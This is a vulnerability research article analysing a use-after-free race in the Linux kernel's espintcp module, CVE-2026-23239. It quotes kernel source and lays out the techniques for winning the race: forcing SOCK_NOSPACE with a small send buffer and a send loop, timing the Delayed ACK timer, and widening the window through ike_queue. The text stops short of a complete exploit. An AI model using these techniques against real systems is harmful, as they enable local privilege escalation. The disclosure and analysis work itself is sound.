Out-of-Cancel: A Vulnerability Class Rooted in Workqueue Cancellation APIs
Introduction
Last year, while exploiting a kernel vulnerability in a specific Linux distribution, I encountered a situation where I needed to intentionally delay the execution of a worker. To deal with this, I looked into the Linux kernel workqueue mechanism and happened to find a relatively new API called disable_work_sync(). This API was introduced not just to cancel work that is currently running, but to prevent the work itself from being queued again later.
With existing work items, the cancel_work_sync() family of APIs could stop a “currently running task”, but there was no fundamental way to prevent the same work from being scheduled again through another path. Unlike tasklets, this means that, in a workqueue-based asynchronous execution model, it is hard to safely control an object’s lifetime using cancellation alone. The fact that disable_work_sync() was added to cover this gap strongly suggests that there is a subtle design issue or vulnerability related to this somewhere in the kernel.
Based on this idea, I started my analysis in the networking subsystem, specifically TCP and ULP (Upper Layer Protocol). TCP is a very complex state machine on its own, and ULP is designed to hook into its internal operation. Because of this, I had long suspected that the TCP code and its surrounding paths could hide issues beyond simple implementation mistakes, including more fundamental synchronization and lifetime management problems.
As a result of the analysis, I found multiple race condition vulnerabilities that keep showing up in code patterns that rely on synchronous worker cancellation. In this article, I call this class of vulnerabilities Out-of-Cancel bugs. These are bugs that appear when the _cancel APIs are treated as a barrier that guarantees an object’s lifetime, even though the object can still “escape” through other asynchronous paths and get rescheduled.
This article uses the espintcp vulnerability (CVE-2026-23239) as a case study to look at the structure in which this Out-of-Cancel bug class shows up, and to walk through how combining complex kernel interleavings makes the bug actually exploitable. In particular, it shows how different execution mechanisms such as interrupts, Delayed ACK, timers, workqueues, and the scheduler come together into a single race scenario, and based on that, it explains how to build an exploit sequence in practice.
All analysis and code path descriptions in this article are based on the Linux kernel v6.18 source tree, and the test kernel was built from an Ubuntu 25.10 configuration with unnecessary options removed.
Cancellation-Based Synchronization as a Bug Class
In many parts of the kernel, object teardown usually follows a pattern like this. First, the work is cleaned up using the _cancel APIs, and then the object is freed. On the surface, this looks safe, but this pattern carries a structural weakness in that it relies on cancellation to manage the object’s lifetime. The _cancel APIs can clean up work that is currently running or already queued, but they do not fundamentally prevent the same work from being queued again through another path.
Simplified, it can be illustrated as follows:
cpu0 cpu1
test_destroy()
cancel_work_sync(&test->work);
test_something()
schedule_work(&test->work);
kfree(test);
[ kworker/1 ]
test_work_handler()
test->a = b; // Use-After-Free
test_destroy() frees the object after cancellation, but if schedule_work() is called again on another CPU, the work can be queued again. As a result, an already freed object can be dereferenced. Of course, for this to happen, test_destroy() and test_something() must not be protected by the same lock. This issue is not limited to cancel_work_sync(). The same applies to other cancellation APIs, including cancel_delayed_work_sync().
The important point is that this is not simply a case of a missing lock or a forgotten condition check. The core problem is the design itself, which treats the _cancel APIs as if they were a synchronization barrier for the object’s lifetime. Cancellation can stop or clean up “what is running right now”, but it does not provide a lifetime guarantee in the sense of “this will never run again”.
In the rest of this article, I refer to this class of vulnerability patterns as Out-of-Cancel bugs.
Backstory: The ULP Implementation Model
Out-of-Cancel bugs showed up most often around the ULP layer and the code around it.
ULP is implemented in a way that “intrusively” hooks into the TCP stack. It attaches callbacks at various points in the receive path, send path, error handling, and other callback sites to extend or modify TCP behavior. This design gives a lot of flexibility, but it also tends to blur the boundaries around object ownership, lifetime, and execution context. In particular, ULP processes stream data through shared infrastructure such as strparser, and along the way it naturally ends up interacting with several of the kernel’s asynchronous execution mechanisms, including workqueues, timers, and softirqs.
TCP itself is already a very complex state machine. Connection setup and teardown, congestion control, retransmission, and delayed ACK handling are all intertwined. Once ULP is added on top of this, even a small implementation mistake or an incomplete teardown path can end up interacting with other parts of TCP in unexpected ways.
One of these ULPs is espintcp. espintcp is a ULP module that sits on top of a TCP socket to implement TCP-based ESP transport as defined in RFC 8229. Its implementation follows the usual ULP model. When a ULP is attached to a TCP socket, it registers callbacks at several points in the receive and send paths, and it uses its own workqueues and timers when it needs asynchronous processing. In short, espintcp goes deep into TCP’s execution flow and works by intercepting or extending data processing and state transitions.
Looking at the code, espintcp allocates and initializes a struct espintcp_ctx via a setsockopt("espintcp") call and then attaches it to the socket. During this setup, function pointers such as ->sendmsg, ->recvmsg, ->sk_write_space, and ->sk_data_ready are replaced with espintcp’s own implementations, which lets it hook into TCP’s send and receive paths and its event handling paths. As a result, espintcp arranges for its own logic to run on data processing, buffer state changes, and various asynchronous events during TCP communication.
static struct tcp_ulp_ops espintcp_ulp __read_mostly = {
.name = "espintcp",
.owner = THIS_MODULE,
.init = espintcp_init_sk,
};
static void build_protos(struct proto *espintcp_prot,
struct proto_ops *espintcp_ops,
const struct proto *orig_prot,
const struct proto_ops *orig_ops)
{
memcpy(espintcp_prot, orig_prot, sizeof(struct proto));
memcpy(espintcp_ops, orig_ops, sizeof(struct proto_ops));
espintcp_prot->sendmsg = espintcp_sendmsg;
espintcp_prot->recvmsg = espintcp_recvmsg;
espintcp_prot->close = espintcp_close;
espintcp_prot->release_cb = espintcp_release;
espintcp_ops->poll = espintcp_poll;
}
static int espintcp_init_sk(struct sock *sk)
{
struct inet_connection_sock *icsk = inet_csk(sk);
struct strp_callbacks cb = {
.rcv_msg = espintcp_rcv,
.parse_msg = espintcp_parse,
};
struct espintcp_ctx *ctx;
int err;
/* sockmap is not compatible with espintcp */
if (sk->sk_user_data)
return -EBUSY;
ctx = kzalloc(sizeof(*ctx), GFP_KERNEL);
if (!ctx)
return -ENOMEM;
err = strp_init(&ctx->strp, sk, &cb);
if (err)
goto free;
__sk_dst_reset(sk);
strp_check_rcv(&ctx->strp);
skb_queue_head_init(&ctx->ike_queue);
skb_queue_head_init(&ctx->out_queue);
if (sk->sk_family == AF_INET) {
sk->sk_prot = &espintcp_prot;
sk->sk_socket->ops = &espintcp_ops;
} else {
mutex_lock(&tcpv6_prot_mutex);
if (!espintcp6_prot.recvmsg)
build_protos(&espintcp6_prot, &espintcp6_ops, sk->sk_prot, sk->sk_socket->ops);
mutex_unlock(&tcpv6_prot_mutex);
sk->sk_prot = &espintcp6_prot;
sk->sk_socket->ops = &espintcp6_ops;
}
ctx->saved_data_ready = sk->sk_data_ready;
ctx->saved_write_space = sk->sk_write_space;
ctx->saved_destruct = sk->sk_destruct;
sk->sk_data_ready = espintcp_data_ready;
sk->sk_write_space = espintcp_write_space;
sk->sk_destruct = espintcp_destruct;
rcu_assign_pointer(icsk->icsk_ulp_data, ctx);
INIT_WORK(&ctx->work, espintcp_tx_work);
/* avoid using task_frag */
sk->sk_allocation = GFP_ATOMIC;
sk->sk_use_task_frag = false;
return 0;
free:
kfree(ctx);
return err;
}
For example, when a packet is received on a socket with espintcp enabled, the receive path proceeds in the following order.
[ NET_RX softirq ]
net_rx_action() // Incoming data arrives
...
tcp_v4_rcv()
tcp_v4_do_rcv()
tcp_rcv_established()
tcp_data_queue()
sk_data_ready(sk) // Notify receive event
strp_data_ready(sk) // Notify strparser that data is available to read
queue_work(strp_wq, &strp->work) // Schedule the strp_work() worker
[ kworker ]
strp_work()
do_strp_work()
strp_read_sock()
tcp_read_sock() // sock->ops->read_sock()
__tcp_read_sock()
strp_recv()
espintcp_parse() // (*strp->cb.parse_msg)()
espintcp_rcv() // strp->cb.rcv_msg()
The goal of this flow is to reconstruct the “byte stream” provided by TCP into “record based messages” that espintcp can understand. tcp_read_sock() takes skb objects that are already queued in the TCP receive queue one by one and passes them to strp_recv(). strp_recv() accumulates this data and uses strparser to reassemble message boundaries. In this process, espintcp_parse() is responsible for determining the length of the next record at the current position in the stream. In the case of espintcp, it reads the first two bytes as a length field and returns the total length of the record. Once strparser has collected that many bytes, the completed record skb is delivered to espintcp_rcv().
espintcp_rcv() receives this completed record, inspects the message contents, and then distinguishes between ESP traffic and non-ESP (IKE) traffic. Messages identified as non-ESP are queued into ctx->ike_queue via handle_nonesp() so that they can later be read from user space with recvmsg(). Messages identified as ESP are passed to a separate processing path. In other words, this entire call chain forms the receive pipeline in which espintcp reconstructs its own protocol message boundaries on top of the TCP stream and then demultiplexes them by type.
Finally, when the user calls recvmsg(), the previously registered espintcp_recvmsg() is executed and copies messages that were queued into ctx->ike_queue by espintcp_rcv() in the earlier receive path into user space.
Case Study on espintcp - CVE-2026-23239
In this article, among the Out-of-Cancel class of bugs that I discovered and patched during this research, I use the espintcp vulnerability (CVE-2026-23239) as a representative case and explain how it is triggered and how the exploit scenario works.
Notably, unlike most kernel vulnerabilities, CVE-2026-23239 does not require creating a user namespace to trigger.
The core of this espintcp vulnerability is in espintcp_close(). Below is the implementation of espintcp_close() that causes the problem.
static void espintcp_close(struct sock *sk, long timeout)
{
struct espintcp_ctx *ctx = espintcp_getctx(sk);
struct espintcp_msg *emsg = &ctx->partial;
strp_stop(&ctx->strp);
sk->sk_prot = &tcp_prot;
barrier();
cancel_work_sync(&ctx->work); // Not protected by lock_sock()
strp_done(&ctx->strp);
skb_queue_purge(&ctx->out_queue);
skb_queue_purge(&ctx->ike_queue);
if (emsg->len) {
if (emsg->skb)
kfree_skb(emsg->skb);
else
sk_msg_free(sk, &emsg->skmsg);
}
tcp_close(sk, timeout);
}
The problem is that it uses cancel_work_sync() instead of disable_work_sync(), and that this call is made outside lock_sock(). Because of this, &ctx->work can still be scheduled again even after cancel_work_sync(&ctx->work) returns, and a race can occur between the remaining cleanup steps in the close path and the worker execution. This is the root cause of the vulnerability.
The function that schedules this &ctx->work is the espintcp_write_space() hook, which replaces ->sk_write_space().
static void espintcp_write_space(struct sock *sk)
{
struct espintcp_ctx *ctx = espintcp_getctx(sk);
schedule_work(&ctx->work);
ctx->saved_write_space(sk);
}
In socket I/O, ->sk_write_space() is a hook that is called when there is free space in the send buffer. It notifies the upper layer that the socket has become writable again and triggers the send path to continue. espintcp_write_space() intercepts this event and reschedules the espintcp worker (ctx->work), causing data queued in its internal buffers to be processed again and transmission to resume.
This espintcp_write_space() is called from the ACK path during TCP data transmission.
[ process context ]
sendmsg(client_sk)
espintcp_sendmsg()
espintcp_push_msgs()
espintcp_sendskmsg_locked()
tcp_sendmsg_locked()
tcp_push()
__tcp_push_pending_frames()
tcp_write_xmit()
tcp_transmit_skb()
...
raise NET_RX_SOFTIRQ
[ NET_RX softirq context - sending DATA ]
net_rx_action()
...
tcp_v4_rcv()
sk = __inet_lookup_skb() // sk: server_sk
tcp_v4_do_rcv(server_sk)
tcp_rcv_established()
__tcp_ack_snd_check()
tcp_send_ack()
__tcp_send_ack()
__tcp_transmit_skb()
...
raise NET_RX_SOFTIRQ
[ NET_RX softirq context - ACK ]
net_rx_action()
...
tcp_v4_rcv()
sk = __inet_lookup_skb() // sk: client_sk
tcp_v4_do_rcv(client_sk)
tcp_rcv_established()
tcp_data_snd_check()
tcp_check_space()
espintcp_write_space()
schedule_work(&ctx->work);
To achieve privilege escalation, this race condition needs to be triggered in a reliable way in a loopback setup. When a user calls sendmsg() on a socket with espintcp enabled, the send path runs, and the corresponding ACK processing comes back almost immediately through the NET_RX path. In this process, the ACK ends up calling sk_write_space(), which in turn triggers schedule_work(&ctx->work) through espintcp_write_space().
The problem is that, unless this ACK based softirq receive path is delayed by tens of µs, in most cases schedule_work(&ctx->work) is handled while the sendmsg() context is still running. In other words, worker scheduling effectively happens inside the execution flow of sendmsg().
On the other hand, the espintcp_close() that needs to race does not run immediately when the user calls close(). Instead, it is invoked through the socket release path when the reference count (f_count) of the struct file finally drops to zero in the VFS layer. If another thread is still running sendmsg(), that thread still holds a file reference, so the actual socket release does not happen yet, and espintcp_close() is not called either.
long __sys_sendmsg(int fd, struct user_msghdr __user *msg, unsigned int flags,
bool forbid_cmsg_compat)
{
struct msghdr msg_sys;
struct socket *sock;
if (forbid_cmsg_compat && (flags & MSG_CMSG_COMPAT))
return -EINVAL;
CLASS(fd, f)(fd); // f_count management
[...]
}
As a result, the point in time when espintcp_sendmsg() is running and the point in time when espintcp_close() runs cannot overlap, and structurally there is no race between the two. In other words, in a loopback setup, simply calling sendmsg() and close() in parallel is not enough to create a race between espintcp_close() and the send path.
To trigger this vulnerability, we need something extra that makes espintcp_close() and espintcp_write_space() actually run at the same time, using an asynchronous execution path that operates independently of the sendmsg() path. There are two approaches to satisfy this condition.
The first approach is to use ksoftirqd to make the NET_RX softirq work that calls espintcp_write_space() race with espintcp_close(). ksoftirqd is a per-CPU kernel thread that is scheduled to handle softirqs when they cannot be processed immediately in interrupt context or when they are deferred. Since it is a kernel thread, it runs in normal process context and can run in parallel with espintcp_close() on another CPU. As a result, when NET_RX softirq processing is pushed into the ksoftirqd context, conditions are created where espintcp_write_space() can actually run at the same time as the close path.
Abstracted, this scenario looks like this:
cpu0 cpu1
close()
inet_release()
espintcp_close()
cancel_work_sync(&ctx->work);
[ ksoftirqd/1 ]
net_rx_action()
...
tcp_v4_rcv()
tcp_v4_do_rcv()
tcp_rcv_established()
tcp_data_snd_check()
tcp_check_space()
espintcp_write_space()
schedule_work(&ctx->work);
The second approach is to use TCP’s Delayed ACK timer. Delayed ACK is a mechanism where the receiver does not send an ACK immediately, waits for a short time to see if more data arrives, and then sends a single ACK. The goal is to reduce the number of packets.
In the Linux TCP stack, tcp_send_delayed_ack() sets up tcp_delack_timer() through sk_reset_timer() to delay ACK transmission. When the timer expires, tcp_delack_timer() runs and enters the path that sends the pending ACK. Here, sk_reset_timer() is the function that arms a kernel timer attached to the socket, and this timer is handled in softirq context. As a result, tcp_delack_timer() runs in softirq context, and by its nature it can run asynchronously even while espintcp_close() is in progress.
void tcp_send_delayed_ack(struct sock *sk)
{
struct inet_connection_sock *icsk = inet_csk(sk);
int ato = icsk->icsk_ack.ato;
unsigned long timeout;
[...]
ato = min_t(u32, ato, tcp_delack_max(sk));
/* Stay within the limit we were given */
timeout = jiffies + ato;
/* Use new timeout only if there wasn't a older one earlier. */
if (icsk->icsk_ack.pending & ICSK_ACK_TIMER) {
/* If delack timer is about to expire, send ACK now. */
if (time_before_eq(icsk_delack_timeout(icsk), jiffies + (ato >> 2))) {
tcp_send_ack(sk);
return;
}
if (!time_before(timeout, icsk_delack_timeout(icsk)))
timeout = icsk_delack_timeout(icsk);
}
smp_store_release(&icsk->icsk_ack.pending,
icsk->icsk_ack.pending | ICSK_ACK_SCHED | ICSK_ACK_TIMER);
sk_reset_timer(sk, &icsk->icsk_delack_timer, timeout); // tcp_delack_timer()
}
Abstracted, this scenario looks like this:
cpu0
[ process context ]
sendmsg()
...
raise NET_RX_SOFTIRQ
[ NET_RX softirq context - sending DATA ]
net_rx_action()
...
__tcp_ack_snd_check()
tcp_send_delayed_ack()
sk_reset_timer(&icsk->icsk_delack_timer)
[ process context ]
close()
inet_release()
espintcp_close()
cancel_work_sync(&ctx->work);
[ timer softirq context - Delayed ACK ]
tcp_delack_timer()
tcp_delack_timer_handler()
tcp_send_ack()
...
raise NET_RX_SOFTIRQ
[ NET_RX softirq context - ACK ]
net_rx_action()
...
tcp_data_snd_check()
tcp_check_space()
espintcp_write_space()
schedule_work(&ctx->work);
Because the tcp_delack_timer() handler is scheduled with an explicit delay through sk_reset_timer(), its execution time is relatively predictable and easier to control. This path also does not rely on a parallel thread. Instead, it runs in softirq context and can interrupt the execution of espintcp_close(). That makes it possible to stop the close path right after the cancel_work_sync(&ctx->work) call. For these reasons, using Delayed ACK is more favorable for controlling the race timing, and this article uses this approach.
The espintcp Race, Step by Step
This race scenario relies on a complex interaction where the TCP send path, receive path, workqueue processing, socket teardown, and interrupt-driven asynchronous paths are all active at the same time. Each step runs in a different context (process, interrupt, worker), and the outcome can vary significantly depending on timing. For that reason, the conditions and progression of the race scenario are broken down into multiple stages and analyzed step by step.
Arming the Socket State
->sk_write_space() is a hook that is called when free space becomes available in the send buffer again. For this hook to be called, the socket must have been blocked at least once in the past due to lack of send buffer space. In the kernel, this state is tracked with the SOCK_NOSPACE flag.
In the ACK softirq path, tcp_check_space() is called to check whether there is free space in the send buffer. Looking at its implementation, it becomes clear that ->sk_write_space() is only invoked when the target socket has the SOCK_NOSPACE flag set.
static void tcp_new_space(struct sock *sk)
{
struct tcp_sock *tp = tcp_sk(sk);
if (tcp_should_expand_sndbuf(sk)) {
tcp_sndbuf_expand(sk);
tp->snd_cwnd_stamp = tcp_jiffies32;
}
INDIRECT_CALL_1(sk->sk_write_space, sk_stream_write_space, sk); // espintcp_write_space()
}
void tcp_check_space(struct sock *sk)
{
/* pairs with tcp_poll() */
smp_mb();
if (sk->sk_socket &&
test_bit(SOCK_NOSPACE, &sk->sk_socket->flags)) {
tcp_new_space(sk);
if (!test_bit(SOCK_NOSPACE, &sk->sk_socket->flags))
tcp_chrono_stop(sk, TCP_CHRONO_SNDBUF_LIMITED);
}
}
In other words, to start the race scenario, the first step is to put the target TCP socket into a state where the SOCK_NOSPACE flag is set. This SOCK_NOSPACE flag is set inside tcp_sendmsg_locked(), which is called from the sendmsg() path, when the condition of insufficient send buffer space is met.
The sequence that leads to the SOCK_NOSPACE flag being set is as follows.
- As the client socket keeps calling
sendmsg()repeatedly, the server socket’ssk->sk_receive_queuegradually fills up. At some point, thetcp_hdr(skb)->windowvalue in the ACK skb sent by the server socket is set to 0 (Zero Window). This means that the server socket no longer has free space to receive more data. -
Once the Zero Window state is reached, the ACK handling path,
tcp_ack()→tcp_ack_update_window()→tcp_snd_una_update(), enters a situation where the advancement ofsk->snd_unaeasily stalls[1]. This happens because the server side can no longer accept more data, which makes it difficult for new data to be delivered from the client side, and as a result the same ACK number keeps arriving. In this case, the ACK value passed totcp_snd_una_update()is the same as before, sosk->snd_unadoes not move forward either.static void tcp_snd_una_update(struct tcp_sock *tp, u32 ack) { u32 delta = ack - tp->snd_una; sock_owned_by_me((struct sock *)tp); tp->bytes_acked += delta; tcp_snd_sne_update(tp, ack); tp->snd_una = ack; // <=[1] } static int tcp_ack_update_window(struct sock *sk, const struct sk_buff *skb, u32 ack, u32 ack_seq) { struct tcp_sock *tp = tcp_sk(sk); int flag = 0; u32 nwin = ntohs(tcp_hdr(skb)->window); if (likely(!tcp_hdr(skb)->syn)) nwin <<= tp->rx_opt.snd_wscale; if (tcp_may_update_window(tp, ack, ack_seq, nwin)) { flag |= FLAG_WIN_UPDATE; tcp_update_wl(tp, ack_seq); if (tp->snd_wnd != nwin) { tp->snd_wnd = nwin; /* Note, it is the only place, where * fast path is recovered for sending TCP. */ tp->pred_flags = 0; tcp_fast_path_check(sk); if (!tcp_write_queue_empty(sk)) tcp_slow_start_after_idle_check(sk); if (nwin > tp->max_window) { tp->max_window = nwin; tcp_sync_mss(sk, inet_csk(sk)->icsk_pmtu_cookie); } } } tcp_snd_una_update(tp, ack); return flag; } -
As a result, in the final stage of ACK processing,
tcp_ack()→tcp_clean_rtx_queue(), the skb objects in the client sidesk->tcp_rtx_queueare considered not fully acked[2]and are left in place instead of being removed[3]. Because of this, memory accounting forsk->tcp_rtx_queueis not released. In the end,sk->sk_wmem_queuedno longer goes down, and if sending continues, it actually starts to grow.static int tcp_clean_rtx_queue(struct sock *sk, const struct sk_buff *ack_skb, u32 prior_fack, u32 prior_snd_una, struct tcp_sacktag_state *sack, bool ece_ack) { const struct inet_connection_sock *icsk = inet_csk(sk); u64 first_ackt, last_ackt; struct tcp_sock *tp = tcp_sk(sk); u32 prior_sacked = tp->sacked_out; u32 reord = tp->snd_nxt; /* lowest acked un-retx un-sacked seq */ struct sk_buff *skb, *next; bool fully_acked = true; long sack_rtt_us = -1L; long seq_rtt_us = -1L; long ca_rtt_us = -1L; u32 pkts_acked = 0; bool rtt_update; int flag = 0; first_ackt = 0; for (skb = skb_rb_first(&sk->tcp_rtx_queue); skb; skb = next) { struct tcp_skb_cb *scb = TCP_SKB_CB(skb); const u32 start_seq = scb->seq; u8 sacked = scb->sacked; u32 acked_pcount; /* Determine how many packets and what bytes were acked, tso and else */ if (after(scb->end_seq, tp->snd_una)) { // <=[2] if (tcp_skb_pcount(skb) == 1 || !after(tp->snd_una, scb->seq)) break; // <=[3] acked_pcount = tcp_tso_acked(sk, skb); if (!acked_pcount) break; fully_acked = false; } else { acked_pcount = tcp_skb_pcount(skb); } [...] } -
As
sendmsg()keeps being called, theskb->lenaccumulated into a single skb insidetcp_sendmsg_locked()keeps increasing and eventually reachessize_goal. At that point, there is no space left to copy, socopybecomes0[4], and as a result the code path enters thenew_segment:label[5].static inline bool __sk_stream_memory_free(const struct sock *sk, int wake) { if (READ_ONCE(sk->sk_wmem_queued) >= READ_ONCE(sk->sk_sndbuf)) return false; return sk->sk_prot->stream_memory_free ? INDIRECT_CALL_INET_1(sk->sk_prot->stream_memory_free, tcp_stream_memory_free, sk, wake) : true; } static inline bool sk_stream_memory_free(const struct sock *sk) { return __sk_stream_memory_free(sk, 0); } int tcp_sendmsg_locked(struct sock *sk, struct msghdr *msg, size_t size) { [...] restart: mss_now = tcp_send_mss(sk, &size_goal, flags); err = -EPIPE; if (sk->sk_err || (sk->sk_shutdown & SEND_SHUTDOWN)) goto do_error; while (msg_data_left(msg)) { int copy = 0; skb = tcp_write_queue_tail(sk); if (skb) copy = size_goal - skb->len; // <=[4] trace_tcp_sendmsg_locked(sk, msg, skb, size_goal); if (copy <= 0 || !tcp_skb_can_collapse_to(skb)) { // <=[5] bool first_skb; new_segment: if (!sk_stream_memory_free(sk)) // <=[6] goto wait_for_space; [...] wait_for_space: set_bit(SOCK_NOSPACE, &sk->sk_socket->flags); // <=[7] tcp_remove_empty_skb(sk); if (copied) tcp_push(sk, flags & ~MSG_MORE, mss_now, TCP_NAGLE_PUSH, size_goal); [...] } - Because
sk->sk_wmem_queuedhas kept increasing, it ends up being much larger thansk->sk_sndbuf, and the code moves to thewait_for_space:label[6]. After that, theSOCK_NOSPACEflag is finally set[7].
A straightforward way for an unprivileged user to trigger this sequence is to pass a small send buffer size hint to the target socket with setsockopt(SO_SNDBUF) and then keep calling send() in a loop. For example, if the send buffer size is constrained to a small value and send() is repeated enough times as shown below, the conditions described above are reached relatively easily.
char buf[1024];
int sndbuf = 1024;
if (setsockopt(fd, SOL_SOCKET, SO_SNDBUF, &sndbuf, sizeof(sndbuf)) < 0)
perror("setsockopt(SO_SNDBUF)");
memset(buf, 'A', sizeof(buf));
for (int i = 0; i < SENDMSG_COUNT; i++) {
ssize_t n = send(fd, buf, sizeof(buf), 0);
}
Delaying Execution with a Bound Workqueue
There is one more point to consider. To actually trigger a UAF, the free of the target object must happen before the espintcp worker performs the UAF write. If the espintcp worker runs immediately right after schedule_work(&ctx->work), the victim object has not been freed yet, so a UAF does not occur. In other words, the execution of the worker needs to be delayed on purpose so that the object is freed first.
The key point here is that the espintcp worker is scheduled through schedule_work(). This API uses the global workqueue system_percpu_wq, which is a per-CPU workqueue handled by kworker threads bound to each CPU[8].
static void __queue_work(int cpu, struct workqueue_struct *wq,
struct work_struct *work)
{
[...]
/* pwq which will be used unless @work is executing elsewhere */
if (req_cpu == WORK_CPU_UNBOUND) {
if (wq->flags & WQ_UNBOUND)
cpu = wq_select_unbound_cpu(raw_smp_processor_id());
else
cpu = raw_smp_processor_id(); // <=[8]
}
[...]
}
static inline bool schedule_work(struct work_struct *work)
{
return queue_work(system_percpu_wq, work);
}
Because of this, the espintcp worker cannot run on a CPU other than the current one. It can only be processed after the currently running task finishes and yields the CPU, meaning that even if schedule_work(&ctx->work) is called, the worker will run only after espintcp_close() returns.
In addition, the kernel used in the current test setup is built from the Ubuntu 25.10 configuration with CONFIG_PREEMPT=n, so there is no forced preemption while kernel code is running. This further reduces the chance that the worker can interrupt the execution of espintcp_close(). As a result, the execution of the worker naturally gets pushed to a point after the close path.
In the current race scenario, schedule_work(&ctx->work) is triggered in the middle of espintcp_close() by the Delayed ACK timer, as shown below.
cpu0
[ process context ]
close()
inet_release()
espintcp_close()
cancel_work_sync(&ctx->work);
[ timer softirq context - Delayed ACK ]
tcp_delack_timer()
tcp_delack_timer_handler()
tcp_send_ack()
...
raise NET_RX_SOFTIRQ
[ NET_RX softirq context - ACK ]
net_rx_action()
...
tcp_data_snd_check()
tcp_check_space()
espintcp_write_space()
schedule_work(&ctx->work);
For this step, the key point is to have the target object for the UAF freed inside espintcp_close(). The socket teardown in the espintcp_close() path should free the object first, and the worker should run only after that.
After that, even if espintcp_close() is delayed by its own implementation details or by various interleavings, the espintcp worker will not run until espintcp_close() finishes, as long as it does not call schedule() and yield the CPU in the middle.
The Delayed ACK Interleaving
Now it is time to arm the Delayed ACK timer that will schedule the espintcp worker.
Delayed ACK behavior is mainly controlled by the icsk->icsk_ack.quick field in struct inet_connection_sock. This value represents how many immediate ACKs are still allowed. Once this counter reaches zero, incoming packets no longer trigger an immediate ACK, and the code path switches to setting the Delayed ACK timer instead.
static bool tcp_in_quickack_mode(struct sock *sk)
{
const struct inet_connection_sock *icsk = inet_csk(sk);
return icsk->icsk_ack.dst_quick_ack ||
(icsk->icsk_ack.quick && !inet_csk_in_pingpong_mode(sk));
}
static void __tcp_ack_snd_check(struct sock *sk, int ofo_possible)
{
struct tcp_sock *tp = tcp_sk(sk);
unsigned long rtt, delay;
/* More than one full frame received... */
if (((tp->rcv_nxt - tp->rcv_wup) > inet_csk(sk)->icsk_ack.rcv_mss &&
/* ... and right edge of window advances far enough.
* (tcp_recvmsg() will send ACK otherwise).
* If application uses SO_RCVLOWAT, we want send ack now if
* we have not received enough bytes to satisfy the condition.
*/
(tp->rcv_nxt - tp->copied_seq < sk->sk_rcvlowat ||
__tcp_select_window(sk) >= tp->rcv_wnd)) ||
/* We ACK each frame or... */
tcp_in_quickack_mode(sk) || // Check icsk->icsk_ack.quick
/* Protocol state mandates a one-time immediate ACK */
inet_csk(sk)->icsk_ack.pending & ICSK_ACK_NOW) {
/* If we are running from __release_sock() in user context,
* Defer the ack until tcp_release_cb().
*/
if (sock_owned_by_user_nocheck(sk) &&
READ_ONCE(sock_net(sk)->ipv4.sysctl_tcp_backlog_ack_defer)) {
set_bit(TCP_ACK_DEFERRED, &sk->sk_tsq_flags);
return;
}
send_now:
tcp_send_ack(sk); // ACK
return;
}
if (!ofo_possible || RB_EMPTY_ROOT(&tp->out_of_order_queue)) {
tcp_send_delayed_ack(sk); // Delayed ACK
return;
}
icsk->icsk_ack.quick is initialized on the server side in the NET_RX path when data is received for the first time. Looking at the implementation of tcp_event_data_recv(), which is called from the NET_RX path, this value is set to the maximum TCP_MAX_QUICKACKS when the first packet is received.
/* Maximal number of ACKs sent quickly to accelerate slow-start. */
#define TCP_MAX_QUICKACKS 16U
static void tcp_event_data_recv(struct sock *sk, struct sk_buff *skb)
{
struct tcp_sock *tp = tcp_sk(sk);
struct inet_connection_sock *icsk = inet_csk(sk);
u32 now;
[...]
if (!icsk->icsk_ack.ato) {
/* The _first_ data packet received, initialize
* delayed ACK engine.
*/
tcp_incr_quickack(sk, TCP_MAX_QUICKACKS);
icsk->icsk_ack.ato = TCP_ATO_MIN;
[...]
}
After that, the icsk->icsk_ack.quick is decremented each time an ACK is sent. Once it reaches zero, the code switches to the Delayed ACK path and arms the tcp_delack_timer() handler.
/* Account for an ACK we sent. */
static inline void tcp_event_ack_sent(struct sock *sk, u32 rcv_nxt)
{
struct tcp_sock *tp = tcp_sk(sk);
[...]
tcp_dec_quickack_mode(sk);
inet_csk_clear_xmit_timer(sk, ICSK_TIME_DACK);
}
At this point, all that is needed is for the Delayed ACK timer to fire after the cancel_work_sync(&ctx->work) call inside espintcp_close(). The espintcp_close() implementation calls tcp_close() to perform TCP stack cleanup, and that function runs its work under lock_sock().
The problem is that when the socket is held under lock_sock(), the NET_RX softirq cannot be processed immediately and the packet is pushed to the backlog (sk_backlog) instead. In that case, ACK processing can be delayed until after tcp_close() finishes. If the socket state transitions to TCP_CLOSE during the close path, then when the backlog is processed later, ->sk_write_space() is no longer called, and the attempt to trigger the vulnerability fails.
int tcp_v4_rcv(struct sk_buff *skb)
{
[...]
bh_lock_sock_nested(sk);
tcp_segs_in(tcp_sk(sk), skb);
ret = 0;
if (!sock_owned_by_user(sk)) {
ret = tcp_v4_do_rcv(sk, skb);
} else {
if (tcp_add_backlog(sk, skb, &drop_reason))
goto discard_and_relse;
}
bh_unlock_sock(sk);
[...]
}
That means the timer has to expire in the narrow window between the cancel_work_sync(&ctx->work) call and the call to tcp_close(). This “Delayed ACK timer expiration window” is only about 1 µs wide, which makes the race very unlikely to succeed.
On top of that, three conditions have to be satisfied at the same time: SOCK_NOSPACE must be set, Delayed ACK must be scheduled, and the espintcp worker that is inevitably scheduled during the repeated send() loop must already be finished. With all of these conditions combined, a timing window on the order of 1 µs is effectively close to impossible to hit.
void tcp_close(struct sock *sk, long timeout)
{
lock_sock(sk);
__tcp_close(sk, timeout);
release_sock(sk);
if (!sk->sk_net_refcnt)
inet_csk_clear_xmit_timers_sync(sk);
sock_put(sk);
}
static void espintcp_close(struct sock *sk, long timeout)
{
struct espintcp_ctx *ctx = espintcp_getctx(sk);
struct espintcp_msg *emsg = &ctx->partial;
strp_stop(&ctx->strp);
sk->sk_prot = &tcp_prot;
barrier();
cancel_work_sync(&ctx->work);
strp_done(&ctx->strp); ------------------------------*
|
skb_queue_purge(&ctx->out_queue); |
skb_queue_purge(&ctx->ike_queue); // <=[9] |
|
if (emsg->len) { *--- Delayed ACK timer expiration window
if (emsg->skb) |
kfree_skb(emsg->skb); |
else |
sk_msg_free(sk, &emsg->skmsg); |
} |
------------------------------*
tcp_close(sk, timeout);
}
For that reason, an intentional delay is injected by stacking skb objects in ctx->ike_queue to widen the “timer expiration window”. espintcp_close() calls skb_queue_purge(&ctx->ike_queue) to clean up received non-ESP (IKE) skb objects[9]. If the server sends IKE skb objects that match the parsing conditions of espintcp_parse() in advance, the client ends up spending extra time freeing these skb objects in the close path. That stretches the overall execution path by the same amount.
